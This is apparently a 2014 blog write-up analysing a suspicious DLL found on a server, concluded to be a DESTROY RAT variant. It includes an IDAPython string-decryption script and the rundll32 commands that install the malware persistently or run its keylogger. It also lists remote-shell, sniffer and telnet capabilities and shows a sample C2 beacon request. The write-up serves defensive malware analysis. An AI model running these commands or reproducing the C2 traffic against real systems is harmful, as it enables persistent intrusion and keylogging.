Malware Analysis

October 16, 2014

Issue

System Administrator finds a suspicious dll running named as “COM APPLICATION SUPPORT.DLL” and raises a security concern.

Static Analysis

We started the analysis by loading the file to check for any known packers. The output of the tool suggested against any such packers as shown below.

1

Loading the file in IDA we could see that all the functions were encrypted revealing no information about the behavior of the code. We were able to identify the following functions relevant to the DLL.

2

We were able to identify the function which has encrypting the binary and hence evading the AV’s for stealth operation on the system. The function in concern is shown below

3
As can be seen from the highlighted text above the key to decrypt certain parts of the DLL could be used. A IDAPython script was created to print the relevant details.

def decrypt(leng, loc, key):
    t1 = key
    t2 = key
    t3 = key
    t4 = key
    out = ''
    for i in range(leng):
        t1 = (t1 - (t1 << 0x3) - 0x3)&0xffffffff
        t2 = (t2 - (t2 << 0x5) - 0x5)&0xffffffff
        t3 = (t3 + (t3 << 0x7) + 0x7)&0xffffffff
        t4 = (t4 + (t4 << 0x9) + 0x9)&0xffffffff
        c = chr(Byte(loc) ^ ((t1 & 0xff) + (t2 & 0xff) + (t3 & 0xff) + (t4 & 0xff))&0xff)
        #unicode
        if ord(c) != 0:
            out = out + str(c)
        loc = loc + 1
    return out

func = 0x10006ab0

callers = list(CodeRefsTo(func, 1))
for i in range(len(callers)):
    neg = 0
    if Byte(callers[i] - 0x03) != 0x8D:
        neg = 3
    key = Dword(callers[i] - 0x0E - neg)
    size = Byte(callers[i] - 0x09 - neg)
    data = Dword(callers[i] - 0x07 - neg)
    dec = decrypt(size, data, key)
    print "%X   %s" % (callers[i], dec)
    #MakeComm(callers[i] - 0x08 - neg, dec)



We were then able to understand the operations that were being performed by the DLL.
The DLL could be run using one of 4 commands.
• Rundll32.exe malware.dll PteGa 0
o Persistent Install of Malware and Run
• Rundll32.exe malware.dll PteGa 1
o Persistent Install of Malware And Exit
• Rundll32.exe malware.dll PteGa 2
o Run Keylogger (%WINDIR%/SYSTEM32/intel.dat)
• Rundll32.exe malware.dll PteGa 3
o Control Other Threads on the System
The DLL has capabilities to adjust to different operating systems from XP-Windows8 and Server editions as well. It uses different methods to bypass UAC or gain privileges for persistence on the installed system.

Multiple malicious functions were found, some of the critical being
• CXSniffer::SnifferProc
o Starts network sniffer on the machine.
• CXFuncShell::ShellT
o Used to create a remote shell on the server granting complete control of machine.
• CXFuncTelnet::TelnetT
o A telnet server to send in commands.

Dynamic Analysis

During the dynamic analysis we found the server connected to a web server to seek for updates as shown below

4

The domain webmailserver.homelinux.com now resolves to 127.0.0.1. Which indicates an inactive state of the Command and Control Server.
A POST request of the following format was being sent to the server.
Accept: */*
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
Host: webmailserver.homelinux.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Conclusion

This malicious binary is a variant of the DESTROY RAT (Remote Administration Tool). The malware seems to have been deployed in other APT attacks mostly on the Industrial Sector. It offers a lot of functionality to the attacker some of which were shown in the above analysis.

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback